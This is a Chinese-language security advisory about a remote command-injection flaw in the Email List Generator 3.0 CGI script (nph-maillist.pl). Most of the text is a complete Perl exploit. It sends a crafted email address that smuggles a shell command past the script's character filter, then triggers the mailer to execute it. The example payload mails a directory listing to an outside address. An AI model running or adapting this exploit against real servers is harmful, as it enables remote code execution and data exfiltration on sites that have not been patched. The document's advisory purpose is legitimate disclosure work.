Email List 生成器存在安全漏洞发布时间:2001-04-13 更新时间:2001-04-13 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Email List Generator version 3.0 (nph-maillist.pl)详细描述 Email List 生成器是一个基于WEB接口的脚本允许浏览者在你的站点留下他们的EMAIL地址,这样可以当你在更新站点的时候可以通知这些浏览者,脚本 也提供站长使用WEB浏览器建立和改变要发送的信息,其中脚本有2部分,nph-maillist.pl文件是支持了所有WEB接口功能和mailengine.pl是一个后台程序 来EMAIL整个列表。其中脚本的nph-maillist.pl存在安全漏洞可以导致远程攻击者执行任意命令。 测试代码 #!/usr/bin/perl # nph-maillist hack... Kanedaaa [ kaneda@ac.pl ] # its add crazy @email, sends mails, and execute our code of coz ;] # # greetzzz to all of Bohatery... [Breslau Kilerz, Lam3rz, my Mom, dog, # hamster... maybe this is not hamster..., wine, SobiechOS, wine, Cucumber # Team Members... yeah. i must go sleep. ;] # and #phreakpl, #hackingpl :] # # . remember thats just simple sploit... You cant play in koules this.. ;] use Socket; # Ip... $ip="127.0.0.1"; # Command to run ... $command = 'ls -al|mail ssie@bigbrother.pl'; ################################################# if (!$ARGV[0]) { print "....nph-maillist hack... Kanedaaa [kaneda\@ac.pl]\n"; print ".........Use the force, edit source...[ ip & command ]\n"; print "\n"; print "1:./nph-maillist-ogorek.pl send - add our special \@email to the list.\n"; print "2:./nph-maillist-ogorek.pl hack - sends emails from list and execute our code.\n"; } if ($ARGV[0] eq "send") { &send } if ($ARGV[0] eq "hack") { &hack } sub send { ########################################### # You cant add this BAD chars... but we can hack this ;] #" " ")" "(" ":" "/" "\" "http:" ########################################### # Hack the "/" problem... change "/" -> `head -n1 nph-maillist.pl|cut -c3` # $command =~ s/\//`head -n1 nph-maillist.pl|cut -c3`/g; # # Hack the ":" problem... change ":" -> `grep ntent-type nph-maillist.pl|tail -n1|awk -F "type" {'print $2'}|cut -c1` # $command =~ s/:/`grep ntent-type nph-maillist.pl|tail -n1|awk -F "type" {'print \$2'}|cut -c1`/g; # # Hack the "\" problem... change "\" -> `grep BGCOLOR nph-maillist.pl|tail -n1|awk -F "=" {'print \$2'}|cut -c1` # $command =~ s/\\/`grep BGCOLOR nph-maillist.pl|tail -n1|awk -F "=" {'print \$2'}|cut -c1`/g; # # Hack the "(" problem... change "(" -> `grep scalar nph-maillist.pl|tail -n1|awk -F "scalar" {'print \$2'}|cut -c1` # $command =~ s/\(/`grep scalar nph-maillist.pl|tail -n1|awk -F "scalar" {'print \$2'}|cut -c1`/g; # # Hack the ")" problem... change ")" -> `grep unlink nph-maillist.pl|awk -F "jobx" {'print \$2'}|cut -c1` # $command =~ s/\)/`grep unlink nph-maillist.pl|awk -F "jobx" {'print \$2'}|cut -c1`/g; ### # Change ascii to hex... $command =~ s/([^\w\!*-])/sprintf("%%%02X",ord($1))/ge; # # Hack the " " problem... change " " -> "\t" [TAB] $command =~ s/%20/%09/g; $r = int(rand(100000)); $command = "$r\@bigbrother.pl;".$command; $parms="emailaddress=$command"; $tosend="GET /cgi-bin/nph-maillist.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/nph-maillist.pl\r\n\r\n"; print sendraw($tosend); print "If server return some ...adding %trash% to the email list...\n"; print "Now run with hack parametr...Peace\n"; } sub hack { $tosend="GET /cgi-bin/mailengine.pl HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/nph-maillist.pl\r\n\r\n"; print sendraw($tosend); print "... Theoretical You are haker... \n"; } ##################################################### # Ripped from some RFP code... :]] I will infuse good Tea for You... # I`am the best Infuser of Tea in .pl ... :] sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} 解决方案 尚无 相关信息 此信息有 Kanedaaa Bohater(kaneda at AC.PL)公布。 |
